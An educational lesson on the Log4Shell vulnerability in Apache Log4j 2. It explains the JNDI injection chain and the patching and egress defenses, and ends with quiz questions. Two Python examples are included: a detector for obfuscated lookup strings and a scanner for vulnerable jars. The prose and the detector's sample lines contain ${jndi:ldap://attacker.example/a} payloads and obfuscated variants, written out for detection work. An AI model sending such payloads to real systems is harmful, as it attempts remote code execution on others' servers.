
quiz vs the machine


Security

Log4Shell And JNDI Injection

How a logged string became remote code execution through a lookup feature.

5 min read · advanced

The Lesson Of Log4Shell

Log4Shell (CVE-2021-44228 in Apache Log4j 2) showed how a logging library that expands lookup expressions inside the messages it formats could be made to fetch and run remote code. Any attacker-controlled string that reached a log call, for example a User-Agent header set to ${jndi:ldap://attacker.example/a}, triggered a JNDI lookup to a server the attacker chose.

The Chain

  • The application logs untrusted input, such as an HTTP header, a username or a form field; nothing about the log call marks the value as dangerous.
  • While formatting the message, Log4j 2 interpolates a ${jndi:...} expression and performs a JNDI lookup over the network, typically LDAP or RMI, to whatever host the string names.
  • The attacker's server answers with a JNDI reference that points at a remote class, or with a serialized object that fires a deserialization gadget already on the classpath; the JVM loads it and runs attacker code inside the application process.
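
The first two steps of the chain, as an added example that is not code from the original lesson. It normalizes the nested-lookup obfuscations that Log4j's interpolator would collapse before the JNDI lookup fires (lower:, upper: and the ":-" default syntax), then flags the canonical ${jndi: form; a detector that only greps for the literal string misses every obfuscated variant. The host attacker.example and the log lines are constructed samples; the JNDI prefix is matched case-insensitively here to be conservative.

```python
"""Normalize Log4j-style ${...} lookups in untrusted text and flag JNDI payloads."""
import re

# Innermost lookup: a ${...} whose body contains no further "$", "{" or "}".
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalization; prefix matched case-insensitively (conservative).
JNDI = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def _resolve_one(body: str):
    """Resolve a single lookup body the way Log4j's interpolator would, for the
    lookups that matter for obfuscation: lower:, upper: and the ":-" default.
    Returns None when the lookup cannot be resolved and carries no default."""
    key, has_default, default = body.partition(":-")
    prefix, _, rest = key.partition(":")
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    # env:, sys:, date:, ... are not resolved here; Log4j falls back to the default.
    return default if has_default else None


def normalize_lookups(text: str, max_rounds: int = 64) -> str:
    """Repeatedly collapse innermost lookups until none can be resolved."""
    for _ in range(max_rounds):
        m = INNERMOST.search(text)
        if m is None:
            break
        value = _resolve_one(m.group(1))
        if value is None:
            # Keep the unresolvable lookup but neutralise "${" so the loop moves on.
            value = "\x01{" + m.group(1) + "}"
        text = text[:m.start()] + value + text[m.end():]
    return text.replace("\x01{", "${")


def is_jndi_payload(text: str) -> bool:
    """True when the text, once normalized, contains a JNDI lookup."""
    return JNDI.search(normalize_lookups(text)) is not None


# Constructed sample log lines (attacker.example is a placeholder host).
SAMPLE_LINES = [
    'GET /login ua="Mozilla/5.0 (X11; Linux x86_64)"',
    'GET /login ua="${jndi:ldap://attacker.example/a}"',
    'GET /login ua="${${lower:j}ndi:ldap://attacker.example/a}"',
    'GET /login ua="${j${::-n}di:${::-l}dap://attacker.example/a}"',
    'GET /login ua="${${env:NOPE:-j}${upper:n}di:ldap://attacker.example/a}"',
    'GET /status ua="${java:version}"',  # lookup syntax, but not a JNDI lookup
]


def scan(lines):
    """Return (raw line, normalized form) for every line carrying a JNDI lookup."""
    hits = []
    for line in lines:
        norm = normalize_lookups(line)
        if JNDI.search(norm):
            hits.append((line, norm))
    return hits


if __name__ == "__main__":
    for raw, norm in scan(SAMPLE_LINES):
        print(f"JNDI payload: {raw}\n    normalizes to: {norm}")
```

Run it as-is to see the four obfuscated lines collapse to the same ${jndi:ldap://attacker.example/a} form; the normalizer deliberately leaves lookups it cannot resolve (such as ${java:version}) in place rather than flagging all lookup syntax, which keeps it usable as a log-search or WAF rule without drowning in false positives.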

Why It Spread

  • Logging is everywhere and rarely treated as a dangerous sink: a User-Agent, a username, a chat message, anything an application wrote to a log became an injection point.
  • Vulnerable code sat deep inside transitive dependencies, fat jars and vendor appliances, so many teams did not know they shipped log4j-core at all.

Defenses

  • Upgrade log4j-core to a fixed release (2.17.1 or later; 2.12.4 on Java 7, 2.3.2 on Java 6). Where you cannot upgrade, remove JndiLookup.class from the jar; the log4j2.formatMsgNoLookups setting proved an incomplete fix (CVE-2021-45046), so do not rely on it alone.
  • Block outbound LDAP, RMI and other unexpected egress from application servers, and keep remote codebase loading disabled in the JVM (com.sun.jndi.ldap.object.trustURLCodebase=false, the default on current JDKs); note that deserialization gadgets already on the classpath can still be abused, so egress control and patching both matter.
  • Maintain a software bill of materials, and scan built artifacts (including jars nested inside fat jars and wars) so you can find affected libraries fast.
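
The last defense in working form, as an added example that is not code from the original lesson: a scanner that walks a directory, opens every jar/war/ear (recursing into archives nested inside them), reads the log4j-core version from its Maven pom.properties, checks whether JndiLookup.class is still present, and gives a verdict per artifact. The sample archives are constructed fixtures containing only the two entries the scanner reads; the version thresholds are the published fixed releases for the 2.x main line and the Java 7 (2.12.x) and Java 6 (2.3.x) backport lines.

```python
"""Find log4j-core jars (including jars nested in fat jars/wars) and classify them."""
import io
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")

# First release of each line that fixed the JNDI RCE (CVE-2021-44228 + CVE-2021-45046)
# and the first release carrying all follow-up fixes (CVE-2021-45105, CVE-2021-44832).
RCE_FIXED = {(2, 3): (2, 3, 1), (2, 12): (2, 12, 2)}      # Java 6 / Java 7 backport lines
ALL_FIXED = {(2, 3): (2, 3, 2), (2, 12): (2, 12, 4)}
MAIN_RCE_FIXED, MAIN_ALL_FIXED = (2, 16, 0), (2, 17, 1)  # everything else on 2.x


def parse_version(version: str):
    """'2.14.1' -> (2, 14, 1); pre-releases such as '2.0-beta9' fall back to (2, 0, 0)."""
    nums = [int(n) for n in re.findall(r"\d+", version.split("-")[0])[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def classify(version, has_jndi_class: bool) -> str:
    if version is None:
        return "unknown version: inspect manually"
    v = parse_version(version)
    if v[0] != 2:
        return "not log4j 2.x: out of scope for Log4Shell"
    line = v[:2]
    if v >= ALL_FIXED.get(line, MAIN_ALL_FIXED):
        return "ok"
    if v >= RCE_FIXED.get(line, MAIN_RCE_FIXED):
        return "upgrade: JNDI RCE fixed, later CVEs outstanding"
    if not has_jndi_class:
        return "mitigated: JndiLookup.class removed, still upgrade"
    return "VULNERABLE: JNDI RCE (CVE-2021-44228 / CVE-2021-45046) reachable"


def _inspect_archive(data: bytes, label: str, findings: list) -> None:
    """Inspect one archive (as bytes) and recurse into archives nested inside it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            props = zf.read(POM_PROPERTIES).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.M)
            version = m.group(1).strip() if m else None
        has_class = JNDI_LOOKUP_CLASS in names
        if version is not None or has_class:
            findings.append({"path": label, "version": version,
                             "jndi_lookup_class": has_class,
                             "verdict": classify(version, has_class)})
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                _inspect_archive(zf.read(name), f"{label}!{name}", findings)


def scan_tree(root: str) -> list:
    """Scan every archive under root; nested archives are labelled outer!inner."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    _inspect_archive(fh.read(), path, findings)
    return findings


def make_sample_jar(version: str, with_jndi_class: bool = True) -> bytes:
    """Constructed stand-in for a log4j-core jar: only the two entries the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPERTIES, "groupId=org.apache.logging.log4j\n"
                    f"artifactId=log4j-core\nversion={version}\n")
        if with_jndi_class:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def demo() -> dict:
    """Build a small tree of constructed archives, scan it, return {jar name: verdict}."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "log4j-core-2.14.1.jar"), "wb") as fh:
            fh.write(make_sample_jar("2.14.1"))
        with open(os.path.join(root, "log4j-core-2.14.1-stripped.jar"), "wb") as fh:
            fh.write(make_sample_jar("2.14.1", with_jndi_class=False))
        war = io.BytesIO()  # a deployable war embedding a fixed log4j-core one level down
        with zipfile.ZipFile(war, "w") as zf:
            zf.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", make_sample_jar("2.17.1"))
        with open(os.path.join(root, "app.war"), "wb") as fh:
            fh.write(war.getvalue())
        return {os.path.basename(f["path"].split("!")[-1]): f["verdict"]
                for f in scan_tree(root)}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

Point scan_tree at a deployment directory or an unpacked container image to use it for real; the pom.properties entry is absent from some shaded or repackaged builds, which is why the presence of JndiLookup.class is recorded separately and an unknown version is reported for manual inspection rather than silently marked safe.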

Key idea

Log4Shell turned logging into a remote code path through automatic lookups of attacker-controlled text, so patch or strip the lookup, cut off outbound LDAP/RMI and untrusted class loading, and track every dependency that embeds the library.

Check yourself


1. What turned simple logging into code execution?

2. Why did the flaw spread so widely?